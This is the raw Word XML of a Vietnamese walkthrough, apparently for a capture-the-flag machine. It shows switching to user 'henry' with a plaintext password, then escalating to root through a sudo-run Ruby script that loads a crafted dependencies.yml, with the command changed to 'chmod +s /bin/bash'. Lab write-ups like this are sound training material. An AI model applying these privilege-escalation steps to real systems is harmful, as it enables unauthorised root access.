        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D3CB6E" w14:textId="26D54668" w:rsidR="005C6F5B" w:rsidRDefault="005C6F5B" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE0908E" wp14:editId="3B168117">
            <wp:extent cx="5705475" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5705475" cy="942975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFABC2F" w14:textId="77777777" w:rsidR="00161D6D" w:rsidRDefault="00161D6D" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EEC5E2" w14:textId="08CB05D8" w:rsidR="00161D6D" w:rsidRDefault="00EC7051" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Password là ”</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7051">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7051">
        <w:t>Q3c1AqGHtoI0aXAYFH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
      <w:r w:rsidR="00161D6D">
        <w:t>Chuyển qua user “henry”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thôi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED03328" w14:textId="6ABB0E29" w:rsidR="00161D6D" w:rsidRDefault="00161D6D" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3624845B" wp14:editId="114F35F2">
            <wp:extent cx="5943600" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1729740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B2CCA" w14:textId="1E91F875" w:rsidR="00A74766" w:rsidRDefault="00A74766" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F56762" w14:textId="13275B1C" w:rsidR="00A74766" w:rsidRDefault="00362369" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sudo permission ở đây có điều tiếc là chúng ta ko thể sửa/xóa file </w:t>
      </w:r>
      <w:r w:rsidRPr="00362369">
        <w:t>/opt/update_dependencies.rb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Nên phải xem nd file này </w:t>
      </w:r>
      <w:r w:rsidR="00790E2A">
        <w:t>có</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gì và chạy thử nó để xem hđ ra sao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DEEFB3" w14:textId="6E9E9E82" w:rsidR="00DB63C4" w:rsidRDefault="00DB63C4" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5633E46D" w14:textId="1FCF0589" w:rsidR="00DB63C4" w:rsidRDefault="00DB63C4" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64142DBD" w14:textId="752B84BF" w:rsidR="00DB63C4" w:rsidRDefault="00DB63C4" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21909278" w14:textId="424FBB78" w:rsidR="00DB63C4" w:rsidRDefault="00DB63C4" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7410D4C2" w14:textId="48F1FC82" w:rsidR="00DB63C4" w:rsidRDefault="00DB63C4" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Đây là nd của file. Nhìn vào code này thì mk hiểu là nó sẽ tiến hành đọc file “</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB63C4">
        <w:t>dependencies.yml</w:t>
      </w:r>
      <w:r>
        <w:t>” và cài đặt các package trong file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7B514" w14:textId="3391CCEF" w:rsidR="00DB63C4" w:rsidRDefault="00DB63C4" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="631D6990" wp14:editId="5750A0E5">
            <wp:extent cx="5943600" cy="371983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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3719830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6FB86C" w14:textId="08031201" w:rsidR="006A0CEB" w:rsidRDefault="006A0CEB" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D6731F" w14:textId="37B172B8" w:rsidR="006A0CEB" w:rsidRDefault="006A0CEB" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nhưng khi chạy thử thì bị lỗi rằng ko tìm thấy file “</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0CEB">
        <w:t>dependencies.yml</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8AD8D2" w14:textId="3156D6B6" w:rsidR="006A0CEB" w:rsidRDefault="006A0CEB" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50BC6696" wp14:editId="53A30DD7">
            <wp:extent cx="5943600" cy="7245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24535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B77C348" w14:textId="6C8B7FB7" w:rsidR="006A0CEB" w:rsidRDefault="006A0CEB" w:rsidP="00924D09">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EAF7250" w14:textId="0A3BB015" w:rsidR="006A0CEB" w:rsidRDefault="00F34F1F" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Như vậy chúng ta có thể tạo 1 file </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0CEB">
        <w:t>dependencies.yml</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và set path variable để chương trình này tìm đến file </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0CEB">
        <w:t>dependencies.yml</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của chúng ta.</w:t>
      </w:r>
      <w:r w:rsidR="0047448D">
        <w:t xml:space="preserve"> Nhưng thế vẫn là chưa đủ để thao túng chương trình theo ý muốn của chúng ta.</w:t>
      </w:r>
      <w:r w:rsidR="00303DE0">
        <w:t xml:space="preserve"> Mà trong file </w:t>
      </w:r>
      <w:r w:rsidR="00303DE0">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00303DE0" w:rsidRPr="006A0CEB">
        <w:t>dependencies.yml</w:t>
      </w:r>
      <w:r w:rsidR="00303DE0">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00303DE0">
        <w:t xml:space="preserve"> này phải chứa payload/mã độc để điều khiển luồng thực thi theo ý chúng ta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDED53F" w14:textId="539BF7B3" w:rsidR="00C122C8" w:rsidRDefault="00C122C8" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau một hồi tìm kiếm, cuối cùng mk tìm đc nó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A8025" w14:textId="0FBA6AF0" w:rsidR="00C122C8" w:rsidRDefault="00D57938" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2628B4FA" wp14:editId="2820DC91">
            <wp:extent cx="5943600" cy="1851025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1851025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187E4B7" w14:textId="6AB95050" w:rsidR="008C08F8" w:rsidRDefault="008C08F8" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chúng ta sẽ add nd này vào file “</w:t>
      </w:r>
      <w:r w:rsidRPr="006A0CEB">
        <w:t>dependencies.yml</w:t>
      </w:r>
      <w:r>
        <w:t>”. Chỗ “git_set: id” thì mk sửa thành “git_set: chmod +s /bin/bash”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44345D41" w14:textId="77777777" w:rsidR="0000024B" w:rsidRDefault="00EC7EB3" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1354F334" wp14:editId="3D02BB67">
            <wp:extent cx="5514975" cy="4391025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="24" name="Picture 24"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chat or text message&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5514975" cy="4391025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCBCBC" w14:textId="77777777" w:rsidR="0000024B" w:rsidRDefault="0000024B" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B98F99" w14:textId="0F811100" w:rsidR="0000024B" w:rsidRDefault="0000024B" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sau khi chạy lệnh “</w:t>
      </w:r>
      <w:r w:rsidRPr="0000024B">
        <w:t>sudo /usr/bin/ruby /opt/update_dependencies.rb</w:t>
      </w:r>
      <w:r>
        <w:t>” thì thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA53EDE" w14:textId="22F349A6" w:rsidR="00D57938" w:rsidRDefault="0000024B" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A5D3926" wp14:editId="587030CF">
            <wp:extent cx="5943600" cy="1023620"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="25" name="Picture 2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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1023620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008C08F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAD66FE" w14:textId="5954F68A" w:rsidR="00CF7A65" w:rsidRDefault="00CF7A65" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B82E4ED" w14:textId="77777777" w:rsidR="00CF7A65" w:rsidRDefault="00CF7A65" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17CC4E3F" w14:textId="13E2824F" w:rsidR="00C122C8" w:rsidRDefault="00C122C8" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73ADC5BF" w14:textId="77777777" w:rsidR="00C122C8" w:rsidRDefault="00C122C8" w:rsidP="00F34F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FD2985" w14:textId="77777777" w:rsidR="00DD2275" w:rsidRDefault="00DD2275" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63183777" w14:textId="5FACC48C" w:rsidR="00D035E2" w:rsidRDefault="00D035E2" w:rsidP="00D035E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D03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90D22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6456C9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70036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28A"/>
    <w:rsid w:val="0000024B"/>
    <w:rsid w:val="001079FD"/>
    <w:rsid w:val="00161D6D"/>
    <w:rsid w:val="00303DE0"/>
    <w:rsid w:val="00362369"/>
    <w:rsid w:val="003C528A"/>
    <w:rsid w:val="0047448D"/>
    <w:rsid w:val="00487B02"/>
    <w:rsid w:val="004C4705"/>
    <w:rsid w:val="00573868"/>
    <w:rsid w:val="005A7464"/>
    <w:rsid w:val="005C6F5B"/>
    <w:rsid w:val="00650F43"/>
    <w:rsid w:val="006A0CEB"/>
    <w:rsid w:val="00704C17"/>
    <w:rsid w:val="00721A77"/>
    <w:rsid w:val="00721CD3"/>
    <w:rsid w:val="00790E2A"/>
    <w:rsid w:val="008C08F8"/>
    <w:rsid w:val="008F09AB"/>
    <w:rsid w:val="00924D09"/>
    <w:rsid w:val="00A0111A"/>
    <w:rsid w:val="00A74766"/>
    <w:rsid w:val="00B0192B"/>
    <w:rsid w:val="00B7361E"/>
    <w:rsid w:val="00C122C8"/>
    <w:rsid w:val="00C206D2"/>
    <w:rsid w:val="00CF7A65"/>
    <w:rsid w:val="00D035E2"/>
    <w:rsid w:val="00D37242"/>
    <w:rsid w:val="00D57938"/>
    <w:rsid w:val="00DB63C4"/>
    <w:rsid w:val="00DD2275"/>
    <w:rsid w:val="00E454E2"/>
    <w:rsid w:val="00E951B1"/>
    <w:rsid w:val="00EC7051"/>
    <w:rsid w:val="00EC7EB3"/>
    <w:rsid w:val="00F34F1F"/>
    <w:rsid w:val="00FA1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0167E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4F3AC807-1565-48F0-A5D8-8054AECC3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9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76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36</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-28T09:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-28T11:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>